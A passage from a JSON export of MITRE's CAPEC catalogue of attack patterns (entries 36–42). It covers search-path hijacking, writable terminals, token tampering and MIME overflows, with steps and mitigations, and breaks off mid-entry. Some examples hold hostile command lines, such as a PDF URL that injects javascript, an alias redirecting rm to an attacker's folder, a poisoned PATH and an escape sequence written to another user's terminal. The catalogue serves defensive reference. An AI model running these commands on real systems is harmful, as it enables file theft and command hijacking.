execute."]},"Example_Instances":{"Example":["Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix \\"cp\\" command can be rerouted to \\"rm\\" or other standard command so the user\'s intention is subverted.","The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.",{"p":["Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)","http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here","The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client\'s browser process."]},{"p":["The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \\"public\\" grants all users with the public role the ability to use the administration functionality.","The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control."],"div":["< security-constraint>",{"style":"margin-left:10px;","class":"informative","div":["<description>Security processing rules for admin screens</description>",{"style":"margin-left:10px;","div":["<auth-constraint>",{"style":"margin-left:10px;","div":["<role-name>administrator</role-name>",{"style":"margin-left:10px;"}]}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"94"},{"CWE_ID":"96"},{"CWE_ID":"95"},{"CWE_ID":"97"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"282"},{"CWE_ID":"270"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"36":{"ID":"36","Name":"Using Unpublished Interfaces","Abstraction":"Standard","Status":"Draft","Description":"An adversary searches for and invokes interfaces that the target system designers did not intend to be publicly available. If these interfaces fail to authenticate requests the attacker may be able to invoke functionality they are not authorized for.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify services] Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.","Technique":["Search via internet for known, published services.","Use automated tools to scan known ports to identify internet-enabled services.","Dump the code from the chip and then perform reverse engineering to analyze the code."]},{"Step":"2","Phase":"Explore","Description":"[Authenticate to service] Authenticate to the service, if required, in order to explore it.","Technique":["Use published credentials to access system.","Find unpublished credentails to access service.","Use other attack pattern or weakness to bypass authentication."]},{"Step":"3","Phase":"Explore","Description":"[Identify all interfaces] Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.","Technique":["For any published services, determine exposed interfaces via the documentation provided.","For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones."]},{"Step":"4","Phase":"Experiment","Description":"[Attempt to discover unpublished functions] Using manual or automated means, discover unpublished or undocumented functions exposed by the service.","Technique":["Manually attempt calls to the service using an educated guess approach, including the use of terms like\' \'test\', \'debug\', \'delete\', etc.","Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features."]},{"Step":"5","Phase":"Exploit","Description":"[Exploit unpublished functions] Using information determined via experimentation, exploit the unpublished features of the service.","Technique":["Execute features that are not intended to be used by general system users.","Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions."]}]},"Prerequisites":{"Prerequisite":"The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be \'discoverable\', but in the event it isn\'t it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service."},"Skills_Required":{"Skill":["A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like."},"Example_Instances":{"Example":"To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one\'s own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google\'s business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers \\"will not know services exist\\" and that \\"even if they did, they wouldn\'t be able to access them because they\'re not on the local LAN.\\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"306"},{"CWE_ID":"693"},{"CWE_ID":"695"},{"CWE_ID":"1242"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Related_Attack_Patterns, Related_Weaknesses, Skills_Required"}],"Previous_Entry_Name":["Using Unpublished Web Service APIs",{"Date":"2015-12-07"},"Using Unpublished APIs",{"Date":"2020-07-30"}]}},"37":{"ID":"37","Name":"Retrieve Embedded Sensitive Data","Abstraction":"Detailed","Status":"Draft","Description":"An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify Target] Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.","Technique":["Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.","Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack."]},{"Step":"2","Phase":"Experiment","Description":"[Apply mining techniques] The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to extract the information of interest.","Technique":["API Profiling. The attacker monitors the software\'s use of registry keys or other operating system-provided storage locations that can contain sensitive information.","Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.","Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.","Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format."]}]},"Prerequisites":{"Prerequisite":["In order to feasibly execute this type of attack, some valuable data must be present in client software.","Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack."]},"Skills_Required":{"Skill":["The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \\"Strings\\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Example_Instances":{"Example":["Using a tool such as \'strings\' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user\'s purview should be.","An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.","Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"226"},{"CWE_ID":"311"},{"CWE_ID":"525"},{"CWE_ID":"312"},{"CWE_ID":"314"},{"CWE_ID":"315"},{"CWE_ID":"318"},{"CWE_ID":"1239"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1278"},{"CWE_ID":"1301"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.004","Entry_Name":"Unsecured Credentials:Private Keys"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Lifting Data Embedded in Client Distributions",{"Date":"2015-11-09"}]}},"38":{"ID":"38","Name":"Leveraging/Manipulating Configuration File Search Paths","Abstraction":"Detailed","Status":"Draft","Description":"This pattern of attack sees an adversary load a malicious resource into a program\'s standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Prerequisites":{"Prerequisite":"The attacker must be able to write to redirect search paths on the victim host."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Ensure that the program\'s compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program","Implementation: Host integrity monitoring"]},"Example_Instances":{"Example":[{"p":["Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \\"rm\\" could be aliased to \\"mv\\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting","In this case the attacker retains a copy of all the files the victim attempts to remove."],"div":["alias rm=mv /usr/home/attacker",{"style":"margin-left:10px;","class":"informative"}]},{"p":["A standard UNIX path looks similar to this","If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers\' behalf:","This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution."],"div":["/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin",{"style":"margin-left:10px;","class":"informative"},"/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"426"},{"CWE_ID":"427"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.007","Entry_Name":"Hijack Execution Flow:Path Interception by PATH Environment Variable"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"39":{"ID":"39","Name":"Manipulating Opaque Client-based Data Tokens","Abstraction":"Standard","Status":"Draft","Description":"In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Enumerate information passed to client side] The attacker identifies the parameters used as part of tokens to take business or security decisions","Technique":["Use WebScarab to reveal hidden fields while browsing.","Use a sniffer to capture packets","View source of web page to find hidden fields","Examine URL to see if any opaque tokens are in it","Disassemble or decompile client-side application","Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc."]},{"Step":"2","Phase":"Explore","Description":"[Determine protection mechanism for opaque token] The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.","Technique":["Look for signs of well-known character encodings","Look for cryptographic signatures","Look for delimiters or other indicators of structure"]},{"Step":"3","Phase":"Experiment","Description":"[Modify parameter/token values] Trying each parameter in turn, the attacker modifies the values","Technique":["Modify tokens logically","Modify tokens arithmetically","Modify tokens bitwise","Modify structural components of tokens","Modify order of parameters/tokens"]},{"Step":"4","Phase":"Experiment","Description":"[Cycle through values for each parameter.] Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server","Technique":["Use network-level packet injection tools such as netcat","Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.","Use modified client (modified by reverse engineering)","Use debugging tools to modify data in client"]}]},"Prerequisites":{"Prerequisite":["An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.","For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere."]},"Skills_Required":{"Skill":["If the client site token is obfuscated.",{"Level":"Medium"},"If the client site token is encrypted.",{"Level":"High"}]},"Resources_Required":{"Resource":"The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \\"message authentication code\\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \\"malicious\\" value, all the protective cryptography in the world can\'t make the value \'correct\' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn\'t help.","Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)","Make sure that all session tokens use a good source of randomness","Perform validation on the server side to make sure that client side data tokens are consistent with what is expected."]},"Example_Instances":{"Example":["With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.","Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \\"u\\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \\"u\\" for \\"a\\" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct \\"flip\\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.","Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"353"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"472"},{"CWE_ID":"565"},{"CWE_ID":"315"},{"CWE_ID":"539"},{"CWE_ID":"384"},{"CWE_ID":"233"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"40":{"ID":"40","Name":"Manipulating Writeable Terminal Devices","Abstraction":"Standard","Status":"Draft","Description":"This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify attacker-writable terminals] Determine if users TTYs are writable by the attacker.","Technique":["Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.","Attempt to write to other user TTYs. This approach could leave a trail or alert a user."]},{"Step":"2","Phase":"Exploit","Description":"[Execute malicious commands] Using one or more vulnerable TTY, execute commands to achieve various impacts.","Technique":"Commands that allow reading or writing end user files can be executed."}]},"Prerequisites":{"Prerequisite":"User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user\'s terminals."},"Skills_Required":{"Skill":["Ability to discover permissions on terminal devices. Of course, brute force can also be used.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Access to a terminal on the target network"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Ensure that terminals are only writeable by named owner user and/or administrator","Design: Enforce principle of least privilege"]},"Example_Instances":{"Example":{"p":["\\"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.","where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim\'s tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\\" [REF-1]","If the victim continues to hit \\"enter\\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on."],"div":["\\"$echo -e \\"\\\\033[30m\\\\033\\\\132\\" > /dev/ttyXX",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"41":{"ID":"41","Name":"Using Meta-characters in E-mail Headers to Inject Malicious Payloads","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user\'s system.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"ChildOf","CAPEC_ID":"134"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Identify and characterize metacharacter-processing vulnerabilities in email headers] An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.","Technique":["Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.","Manually tampering email headers to inject malicious metacharacter-based payload content in them."]},{"Step":"2","Phase":"Exploit","Description":"An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.","Technique":"Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase."}]},"Prerequisites":{"Prerequisite":"This attack targets most widely deployed feature rich email applications, including web based email programs."},"Skills_Required":{"Skill":["To distribute email",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":["Design: Perform validation on email header data","Implementation: Implement email filtering solutions on mail server or on MTA, relay server.","Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names"]},"Example_Instances":{"Example":[{"div":["To:<someone@example.com>",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.","Meta-characters like \\\\w \\\\s \\\\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user\'s process."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"150"},{"CWE_ID":"88"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}}},"42":{"ID":"42","Name":"MIME Conversion","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target mail server] The adversary identifies a target mail server that they wish to attack.","Technique":"Use Nmap on a system to identify a mail server service."},{"Step":"2","Phase":"Explore","Description":"[Determine viability of attack] Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4)."},{"Step":"3","Phase":"Experiment","Description":"[Find injection vector] Identify places in the system where vulnerable MIME conversion routines may be used."},{"Step":"4","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code."}]},"Prerequisites":{"Prerequisite":["The target system uses a mail server.","Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user\'s system."]},"Skills_Required":{"Skill":["It may be trivial to cause a DoS via this attack pattern",{"Level":"Low"},"Causing arbitrary code to execute on the target system.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Stay up to date with third party vendor patches",{"p":["Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.","For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):","This can be achieved for the \\"Mlocal\\" and \\"Mprog\\" Mailers by modifying the \\".mc\\" file to include the following lines:","and then rebuilding the sendmail.cf file using m4(1).","From \\"Exploiting Software\\", please see reference below."],"div":["Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,",{"style":"margin-left:10px;","class":"informative","div":["T=DNS/RFC822/X-Unix,",{"style":"margin-left:10px;"},"D=$z:/,",{"style":"margin-left:10px;"}]},"define(`LOCAL_MAILER_FLAGS\',",{"style":"margin-left:10px;","class":"informative","div":["ifdef(`LOCAL_MAILER_FLAGS\',",{"style":"margin-left:10px;","div":["`translit(LOCAL_MAILER_FLAGS, `9\')\',",{"style":"margin-left:10px;"}]},"ifdef(`LOCAL_SHELL_FLAGS\',",{"style":"margin-left:10px;","div":["`translit(LOCAL_SHELL_FLAGS, `9\')\',",{"style":"margin-left:10px;"}]}]}]},"Use the sendmail restricted shell program (smrsh)","Use mail.local"]},"Example_Instances":{"Example":{"div":["Attack Example: Sendmail Overflow",{"style":"color:#32498D; font-weight:bold;"}],"p":["A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can 